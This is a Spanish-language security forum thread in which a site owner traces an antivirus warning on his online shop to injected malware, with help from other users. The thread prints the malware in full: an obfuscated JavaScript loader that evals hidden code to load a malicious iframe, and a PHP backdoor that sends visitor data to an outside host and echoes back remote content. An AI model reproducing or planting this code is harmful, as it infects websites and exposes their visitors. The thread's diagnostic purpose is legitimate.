Author Topic: Url: Mal (Read 18254 times)

rocker84 · « **on:** June 27, 2013, 04:33:01 AM »

Hola gente, en mi web hxxp://www.fancyonline.com.ar me sale este virus:

URL:   hxxp://bachmanncollege.biz/hzziuv0ORK10x...
Process:   C:\Program Files (x86)\Mozilla Firefox\f...
Infection:   URL:Mal

me estoy volviendo loco, a veces salta, a veces no. Un par de cliente me lo comentaron también. Baje el sitio entero, le di scan y no encuentra nada. En virustotal y en http://vscan.novirusthanks.org/ y http://sitecheck.sucuri.net/ sale que está limpio. Que estoy haciendo mal? Gracias de antemano!

miguelgrado · « **Reply #1 on:** June 27, 2013, 09:34:51 AM »

Si piensas que es un fp envia el reporte a vast y si es asi en unos dias estara solucionado http://www.avast.com/es-es/contact-form.php
Mira estos reporte http://www.urlvoid.com/scan/bachmanncollege.biz/
http://scanurl.net/?u=http%3A%2F%2Fbachmanncollege.biz%2Fhzziuv0ORK10x&uesb=Check+This+URL#results

Populous · « **Reply #2 on:** June 27, 2013, 08:00:57 PM »

Quote from: rocker84 on June 27, 2013, 04:33:01 AM

Hola gente, en mi web fancyonline.com.ar me sale este virus:

URL: http://bachmanncollege.biz/hzziuv0ORK10x...
Process: C:\Program Files (x86)\Mozilla Firefox\f...
Infection: URL:Mal

me estoy volviendo loco, a veces salta, a veces no. Un par de cliente me lo comentaron también. Baje el sitio entero, le di scan y no encuentra nada. En virustotal y en http://vscan.novirusthanks.org/ y http://sitecheck.sucuri.net/ sale que está limpio. Que estoy haciendo mal? Gracias de antemano!

Hola rocker84 y bienvenid@ al foro

Edita por favor tu post y modifica el enlace sustituyendo http por hxxp para evitar así que otros usuarios puedan resultar infectados.

En cuanto a lo de ser un F/P no lo creo. Lo he probado con Avast y con KAV y ambos me indican que el sitio está infectado. Seguramente es algún tipo de redirección extraña ó algún script malicioso que ha sido inyectado.

Este es el resultado de Virus total:
https://www.virustotal.com/es/url/0a6c2485796a59638222c27f00c9b446eccafb431508c8f4a5edfcb6772057ea/analysis/1372355741/

Los principales antivirus lo detectan como amenaza por lo que para mi no es un F/P.

No olvides modificar el enlace por favor para evitar que otros usuarios se infecten.. Gracias

Adjunto captura de pantalla en un equipo con KIS instalado para que veas que no sólo Avast lo detecta como amenaza....
Saludos!

AÑADIDO:

Lo más seguro es que en algun archivo de tu sitio web (fancyonline.xcom) se está redirigiendo el navegador a la otra URL (hxxp://bachmanncollege.biz/hzziuv0ORK10x...) que es la que está infectada y añadida a la base de datos de varios antivirus como "insegura e infectada". Yo descargaría tu sitio web completo y revisaría que no haya ningún script "extraño" en la web. Si no sabes cómo hacerlo deberías pedir ayuda a tu proveedor de hosting para que lo revisen..

Fancyonline sale limpio en VT. (https://www.virustotal.com/es/url/51d54cbc3909813332be173a239b0954d8c354209d91f22d804b98d0070ec367/analysis/1372356118)

En este foro lo más que podemos hacer es decir que reportes tu web como un F/P pero en mi opinión no lo es.. Asegúrate antes y cuando tengas la certeza al 100% de que tu sitio está limpio entonces reportalo como F/P.

Saludos y siento no poder ayudarte más..

rocker84 · « **Reply #3 on:** June 28, 2013, 03:56:13 AM »

muchas gracias por las respuestas, ahi corregí el hxxp por las dudas, disculpas no me había dado cuenta

escanie el sitio completo bajado, con el avast, y salió limpio, lo mismo con mysql y no había links raros tampoco. Busque cada http:// en todo el código en todas los php y nada raro...

ahora recién me meto a mi web fancyonline y no saltó nada con el avast, ni en chrome, ni en firefox, ni en ie....
puede ser que quede en la memoria y no avise más?? sino magicamente se borró? o solucionaron justo el error en la base del avast?
a alguien le salta el virus?
Gracias!

iroc9555 · « **Reply #4 on:** June 28, 2013, 02:52:49 PM »

Rocker84

Lo siento tu pagina me alerto: URL:MAL ver imagen

Quote from: Populous on June 27, 2013, 08:00:57 PM

....Lo más seguro es que en algun archivo de tu sitio web (fancyonline.xcom) se está redirigiendo el navegador a la otra URL (hxxp://bachmanncollege.biz/hzziuv0ORK10x...) que es la que está infectada y añadida a la base de datos de varios antivirus como "insegura e infectada".

Estoy de acuerdo. La alerta que Avast! me tiro pertenece a otro sitio web que la alerta pasada. Tienes un redirector en algun lado tienes que encontrarlo.

polonus · « **Reply #5 on:** June 28, 2013, 03:23:58 PM »

Re: https://www.virustotal.com/nl/url/3f483668b95d19658287be467c18ac57bf66804a6845fabb3e4972518e361cb5/analysis/
URL subjected to threat Mal/HTMLGen-A.
Re: http://scanurl.net/?u=http%3A%2F%2Fbachmanncollege.biz&uesb=Check+This+URL#results
Site blacklisted: http://www.surbl.org/lists
Taken down: Unable to properly scan your site. Site empty (no content).
*Cached results from 48 hrs ago. address is unreachable
For IP -> https://www.virustotal.com/nl/ip-address/31.44.184.62/information/

polonus

iroc9555 · « **Reply #6 on:** June 28, 2013, 03:30:56 PM »

Hi Polonus.

Thanks for your input. One question though. Is it hxxp://www.fancyonline.com.ar redirecting to those sites because.... What ? That is what the OP wants to know. The million $ question

rocker84 · « **Reply #7 on:** July 02, 2013, 11:24:52 PM »

ahi me saltò de nuevo el aviso de virus, cambiò la redirecciòn a hxxp://protectionacross.biz, el còdigo infiltrado que figura en el navegador es el siguiente, todavìa no lo encuentro en los php, es como que se activa a veces y a vaces no...no me va a ganar........ $:-\$
el problema es que no se què buscar...

el html generado empieza asi con la script sospechosa:

<script>ss=String;ps="sp"+"l"+"i"+"t";asd=function(){++d.body};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,164,166,163,170,151,147,170,155,163,162,167,145,147,166,163,167,167,62,146,155,176,63,123,161,120,107,172,147,64,156,111,175,113,64,113,122,176,126,64,151,70,156,127,65,72,176,170,111,64,67,75,160,74,64,75,70,130,71,64,166,72,163,171,64,146,117,113,170,64,162,125,113,172,64,124,134,146,117,64,105,130,116,106,64,74,147,66,154,63,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,164,166,163,170,151,147,170,155,163,162,167,145,147,166,163,167,167,62,146,155,176,63,123,161,120,107,172,147,64,156,111,175,113,64,113,122,176,126,64,151,70,156,127,65,72,176,170,111,64,67,75,160,74,64,75,70,130,71,64,166,72,163,171,64,146,117,113,170,64,162,125,113,172,64,124,134,146,117,64,105,130,116,106,64,74,147,66,154,63,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));d=document;for(i=0;i<a.length;i+=1){a=-(10-6)+parseInt(a,8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(ss["fr"+"omCharCode"].apply(ss,a));</script><!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="es">
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-xxxxxx-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

iroc9555 · « **Reply #8 on:** July 03, 2013, 12:07:44 AM »

¿ Ya lo reportastes como F/P ? http://www.avast.com/es-es/contact-form.php?loadStyles
¿ Te contestaron algo ? Avast! puede que te diga que pasa en la respuesta.

El problema reside en que tu sitio como tal esta limpio pero te lleva a todo estos sitios que estan en lista negra. Voy a pedirle a !Donovan , nuestro guru en scripting code, que le eche una mirada a tu sitio a ver si consigue algo, pero puede que no tengas constentacion hasta mañana o pasado. Cruza los dedos.

rocker84 · « **Reply #9 on:** July 03, 2013, 12:15:22 AM »

Quote from: iroc9555 on July 03, 2013, 12:07:44 AM

¿ Ya lo reportastes como F/P ? http://www.avast.com/es-es/contact-form.php?loadStyles
¿ Te contestaron algo ? Avast! puede que te diga que pasa en la respuesta.

El problema reside en que tu sitio como tal esta limpio pero te lleva a todo estos sitios que estan en lista negra. Voy a pedirle a !Donovan , nuestro guru en scripting code, que le eche una mirada a tu sitio a ver si consigue algo, pero puede que no tengas constentacion hasta mañana o pasado. Cruza los dedos.

no, no lo reporte como FP ya que claramente es un virus, ese còdigo no lo genera oscommerce. Algo ahi hay, estoy sospechando seriamente que sea algo en el servidor y por ende se ejecuta en mi web tambièn, no se si es posible. En el proveedor de hosting me dicen que el problema es en mi web, que elimine esa primera linea del còdigo html.

Gracias por la mano que me estàn dando!

iroc9555 · « **Reply #10 on:** July 03, 2013, 12:33:19 AM »

Aunque sea obvio que tiene alguna infeccion, Avast! puede darte una explicacion de lo que esta detectando y asi hacerlo mas facil para ti buscar la causa. Ya le mande un mensage a !Donovan este chamo se las trae a la hora de analizar sitios web. Veamos si encuentra algo.

No, de nada. Para eso es un foro. Tratar de ayudarnos y aprender. Suerte

rocker84 · « **Reply #11 on:** July 03, 2013, 12:54:23 AM »

lo encontre!!!!!!!!!!

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

iroc9555 · « **Reply #12 on:** July 03, 2013, 01:01:12 AM »

¡ El que persevera alcanza ! De todas formas dejare que !Donovan lo vea.

rocker84 · « **Reply #13 on:** July 03, 2013, 01:11:26 AM »

Quote from: iroc9555 on July 03, 2013, 01:01:12 AM

¡ El que persevera alcanza ! De todas formas dejare que !Donovan lo vea.

asì es, nunca rendirse, muchas gracias
ahora voy a ver como fue que entrò ese còdigo ahi....

rocker84 · « **Reply #14 on:** July 03, 2013, 02:12:12 AM »

ahi decodifiqué con php la cadena larga de letras.....
hxxp://pubbotstatistic.com/statC/stat.php

habría que mandarles el fbi o algo....

Author Topic: Url: Mal (Read 18254 times)

rocker84

Url: Mal

miguelgrado

Re: Url: Mal

Populous

Re: Url: Mal

rocker84

Re: Url: Mal

iroc9555

Re: Url: Mal

polonus

Re: Url: Mal

iroc9555

Re: Url: Mal

rocker84

Re: Url: Mal

iroc9555

Re: Url: Mal

rocker84

Re: Url: Mal

iroc9555

Re: Url: Mal

rocker84

Re: Url: Mal

iroc9555

Re: Url: Mal

rocker84

Re: Url: Mal

rocker84

Re: Url: Mal